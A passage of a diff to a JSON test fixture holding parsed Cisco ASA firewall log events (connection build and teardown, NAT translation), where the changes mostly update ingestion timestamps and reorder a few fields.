6, - "ingested": "2021-12-09T13:34:28.099846500Z", + "ingested": "2021-12-14T14:39:19.188500021Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +10120,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099851100Z", + "ingested": "2021-12-14T14:39:19.188500403Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", @@ -10206,7 +10206,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099856600Z", + "ingested": "2021-12-14T14:39:19.188500917Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10291,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099861600Z", + "ingested": "2021-12-14T14:39:19.188501305Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", @@ -10376,7 +10376,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099867600Z", + "ingested": "2021-12-14T14:39:19.188501683Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10458,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099872Z", + "ingested": "2021-12-14T14:39:19.188502067Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10537,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099876400Z", + "ingested": "2021-12-14T14:39:19.188502465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", @@ -10620,7 +10620,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099896Z", + "ingested": "2021-12-14T14:39:19.188502846Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10699,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099900700Z", + "ingested": "2021-12-14T14:39:19.188503305Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", @@ -10785,7 +10785,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099906400Z", + "ingested": "2021-12-14T14:39:19.188503694Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", @@ -10867,7 +10867,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099912100Z", + "ingested": "2021-12-14T14:39:19.188504086Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", @@ -10946,7 +10946,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099939700Z", + "ingested": "2021-12-14T14:39:19.188504476Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", @@ -11032,7 +11032,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099945700Z", + "ingested": "2021-12-14T14:39:19.188504870Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", @@ -11117,7 +11117,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.099951700Z", + "ingested": "2021-12-14T14:39:19.188505287Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", @@ -11200,7 +11200,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099957600Z", + "ingested": "2021-12-14T14:39:19.188505669Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11283,7 +11283,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099963500Z", + "ingested": "2021-12-14T14:39:19.188506052Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", @@ -11362,7 +11362,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099969400Z", + "ingested": "2021-12-14T14:39:19.188506434Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", @@ -11447,7 +11447,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099990900Z", + "ingested": "2021-12-14T14:39:19.188506819Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", @@ -11530,7 +11530,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099994700Z", + "ingested": "2021-12-14T14:39:19.188507226Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11615,7 +11615,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099999200Z", + "ingested": "2021-12-14T14:39:19.188507616Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", @@ -11697,7 +11697,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100004200Z", + "ingested": "2021-12-14T14:39:19.188508004Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", @@ -11776,7 +11776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100009100Z", + "ingested": "2021-12-14T14:39:19.188508392Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", @@ -11862,7 +11862,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100014700Z", + "ingested": "2021-12-14T14:39:19.188508771Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", @@ -11947,7 +11947,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100018900Z", + "ingested": "2021-12-14T14:39:19.188509161Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", @@ -12030,7 +12030,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100023Z", + "ingested": "2021-12-14T14:39:19.188509552Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12115,7 +12115,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100026500Z", + "ingested": "2021-12-14T14:39:19.188510122Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -12197,7 +12197,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100030800Z", + "ingested": "2021-12-14T14:39:19.188510513Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", @@ -12276,7 +12276,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100036400Z", + "ingested": "2021-12-14T14:39:19.188510911Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", @@ -12361,7 +12361,7 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-12-09T13:34:28.100042Z", + "ingested": "2021-12-14T14:39:19.188511316Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", @@ -12385,22 +12385,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -12410,12 +12404,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100047800Z", + "ingested": "2021-12-14T14:39:19.188511721Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", @@ -12429,7 +12426,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -12491,7 +12491,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100053400Z", + "ingested": "2021-12-14T14:39:19.188512193Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12575,7 +12575,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100059Z", + "ingested": "2021-12-14T14:39:19.188512663Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12660,7 +12660,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100064500Z", + "ingested": "2021-12-14T14:39:19.188513054Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", @@ -12743,7 +12743,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100070100Z", + "ingested": "2021-12-14T14:39:19.188513442Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12828,7 +12828,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100075600Z", + "ingested": "2021-12-14T14:39:19.188513833Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", @@ -12912,7 +12912,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100102900Z", + "ingested": "2021-12-14T14:39:19.188514225Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12995,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100109Z", + "ingested": "2021-12-14T14:39:19.188514629Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +13080,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100114900Z", + "ingested": "2021-12-14T14:39:19.188515019Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13162,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100120800Z", + "ingested": "2021-12-14T14:39:19.188515409Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13241,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100126600Z", + "ingested": "2021-12-14T14:39:19.188515799Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", @@ -13325,7 +13325,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100131800Z", + "ingested": "2021-12-14T14:39:19.188516311Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13410,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100136700Z", + "ingested": "2021-12-14T14:39:19.188516696Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13492,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100158500Z", + "ingested": "2021-12-14T14:39:19.188517103Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13571,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100164200Z", + "ingested": "2021-12-14T14:39:19.188517513Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13654,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100187400Z", + "ingested": "2021-12-14T14:39:19.188517899Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", @@ -13733,7 +13733,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100192Z", + "ingested": "2021-12-14T14:39:19.188518348Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13816,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100196400Z", + "ingested": "2021-12-14T14:39:19.188518790Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13895,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100201Z", + "ingested": "2021-12-14T14:39:19.188519180Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13981,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100205200Z", + "ingested": "2021-12-14T14:39:19.188519560Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +14063,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100210400Z", + "ingested": "2021-12-14T14:39:19.188520588Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", @@ -14142,7 +14142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100232500Z", + "ingested": "2021-12-14T14:39:19.188520991Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100238300Z", + "ingested": "2021-12-14T14:39:19.188521394Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14304,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100243800Z", + "ingested": "2021-12-14T14:39:19.188521780Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14390,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100249400Z", + "ingested": "2021-12-14T14:39:19.188522164Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14475,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100255Z", + "ingested": "2021-12-14T14:39:19.188522576Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", @@ -14560,7 +14560,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100260600Z", + "ingested": "2021-12-14T14:39:19.188522963Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14642,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100266200Z", + "ingested": "2021-12-14T14:39:19.188523363Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14721,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100271800Z", + "ingested": "2021-12-14T14:39:19.188523835Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14804,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100277300Z", + "ingested": "2021-12-14T14:39:19.188524216Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14883,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100282800Z", + "ingested": "2021-12-14T14:39:19.188524593Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", @@ -14967,7 +14967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100288400Z", + "ingested": "2021-12-14T14:39:19.188524976Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +15052,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100294Z", + "ingested": "2021-12-14T14:39:19.188525362Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +15137,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100298900Z", + "ingested": "2021-12-14T14:39:19.188525816Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15219,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100302400Z", + "ingested": "2021-12-14T14:39:19.188526230Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15298,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100306900Z", + "ingested": "2021-12-14T14:39:19.188526617Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", @@ -15381,7 +15381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100312100Z", + "ingested": "2021-12-14T14:39:19.188527002Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100317Z", + "ingested": "2021-12-14T14:39:19.188527391Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15546,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100322700Z", + "ingested": "2021-12-14T14:39:19.188527778Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15631,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100326900Z", + "ingested": "2021-12-14T14:39:19.188528306Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15713,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100331100Z", + "ingested": "2021-12-14T14:39:19.188528685Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", @@ -15792,7 +15792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100334600Z", + "ingested": "2021-12-14T14:39:19.188529069Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15875,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100338900Z", + "ingested": "2021-12-14T14:39:19.188529446Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15954,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100344500Z", + "ingested": "2021-12-14T14:39:19.188529833Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -15979,22 +15979,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], 